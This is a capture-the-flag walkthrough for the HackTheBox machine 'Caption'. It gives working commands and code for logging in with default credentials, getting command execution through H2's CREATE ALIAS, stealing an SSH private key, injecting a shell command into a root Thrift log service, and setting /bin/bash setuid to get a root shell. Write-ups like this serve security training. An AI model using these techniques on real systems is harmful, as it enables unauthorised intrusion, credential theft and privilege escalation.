Hackthebox - Caption [machine]

Step-by-Step Solution for “Caption” on HackTheBox:

Step 1: Access the Web Interface

  • Navigate to the web application on port 8080 (the hostname is caption.htb, the same one used for SSH later; add it to /etc/hosts if it does not resolve):
    Go to: http://caption.htb:8080
    

Step 2: Login Using Default Credentials

  • Use the default credentials root:root to log in:
    Username: root
    Password: root
    

Step 3: Execute a Command via the H2 Database Console

  • The admin panel's DB viewer runs SQL against an embedded H2 database. H2's CREATE ALIAS lets you define a function whose body is Java source, so an authenticated admin can turn the SQL console into command execution (this is arbitrary SQL run with admin rights, not an injection through user input). Define the alias once, then call it with the command you want:
    -- Define EXECVE: runs a command and returns its standard output as a string
    CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { 
        // Delimiter \A (start of input) never matches again, so next() returns the whole stream
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); 
        return s.hasNext() ? s.next() : "";  
    }$$;
    
    -- Run a command; the output shows which account the database process runs as
    CALL EXECVE('id');
    

Step 4: Extract SSH Private Key

  • Use the EXECVE alias to read the private key from the .ssh directory of the account the database process runs as (margo on this box). Save the output locally as id_rsa and restrict its permissions (chmod 600), otherwise ssh refuses to use it:
    CALL EXECVE('cat /home/margo/.ssh/id_rsa');
    

Step 5: SSH into the Machine

  • Now that you have the private key, use it to log in as margo:
    ssh -i id_rsa margo@caption.htb
    

Step 6: Port Forwarding to Access Root Service

  • A Thrift log service runs as root on the box but listens only on 127.0.0.1:9090, so forward that port over SSH to reach it from your machine (local port 9090 is tunnelled to 127.0.0.1:9090 on the remote host):
    ssh -i id_rsa -L 9090:127.0.0.1:9090 margo@caption.htb
    

Step 7: Create a Malicious Log File

  • On the remote machine (as margo), create a log file whose user-agent field breaks out of the quoted string the service builds its shell command from, runs the payload, and comments out the rest of the line with #. The line has to be written with double quotes so the shell does not treat the embedded single quote and ; as its own syntax; check the file with cat afterwards:
    echo "127.0.0.1 \"user-agent\":\"'; /bin/bash /tmp/payload.sh #\"" > /tmp/malicious.log
    

Step 8: Create the Payload

  • Create the script that the injected command runs. Because the service executes it as root, chmod +s sets the setuid (and setgid) bit on /bin/bash, so any user can later run bash with root privileges. The script is invoked through /bin/bash explicitly, so the execute bit is not strictly required, but it does no harm:
    echo 'chmod +s /bin/bash' > /tmp/payload.sh
    chmod +x /tmp/payload.sh
    

Step 9: Create a Thrift Client to Trigger the Exploit

  • On your local machine, create the Thrift IDL file describing the service interface: a single LogService with one method, ReadLogFile, that takes the path of the log file to parse:

    echo 'namespace go log_service
    
    service LogService {
        string ReadLogFile(1: string filePath)
    }' > log_service.thrift
    
  • Generate the Python client code (it is written to gen-py/log_service/, which client.py needs on its import path):

    thrift -r --gen py log_service.thrift
    

Step 10: Run the Thrift Client to Exploit the Vulnerability

  • Write the client.py script that asks the root service to read the malicious log file, which triggers the command injection:

    import sys
    sys.path.insert(0, 'gen-py')  # directory created by `thrift --gen py`

    from thrift import Thrift
    from thrift.transport import TSocket
    from thrift.transport import TTransport
    from thrift.protocol import TBinaryProtocol
    from log_service import LogService  # generated Thrift client code
    
    def main():
        # Connect to the forwarded port; the SSH tunnel delivers it to 127.0.0.1:9090 on the box
        transport = TSocket.TSocket('localhost', 9090)
    
        # Buffering for performance
        transport = TTransport.TBufferedTransport(transport)
    
        # Using a binary protocol
        protocol = TBinaryProtocol.TBinaryProtocol(transport)
    
        # Create a client to use the service
        client = LogService.Client(protocol)
    
        # Open the connection
        transport.open()
    
        try:
            # Path on the remote host of the log file created in Step 7
            log_file_path = "/tmp/malicious.log"
            
            # Call the remote method ReadLogFile; the root service parses the file and runs the injected command
            response = client.ReadLogFile(log_file_path)
            print("Server response:", response)
        
        except Thrift.TException as tx:
            print(f"Thrift exception: {tx}")
    
        finally:
            # Close the transport even if the call failed
            transport.close()
    
    if __name__ == '__main__':
        main()
    
  • Install the necessary Python dependencies:

    pip3 install thrift
    
  • Run the Thrift client:

    python3 client.py
    

Step 11: Get Root Access and the Flag

  • After the Thrift client has run, the root service has executed the payload and /bin/bash on the box is now setuid root (confirm with ls -l /bin/bash). Back in the margo SSH session, run it with -p so bash keeps the elevated effective UID instead of dropping it, giving a root shell:

    /bin/bash -p
    
  • Finally, read the root flag:

    cat /root/root.txt
    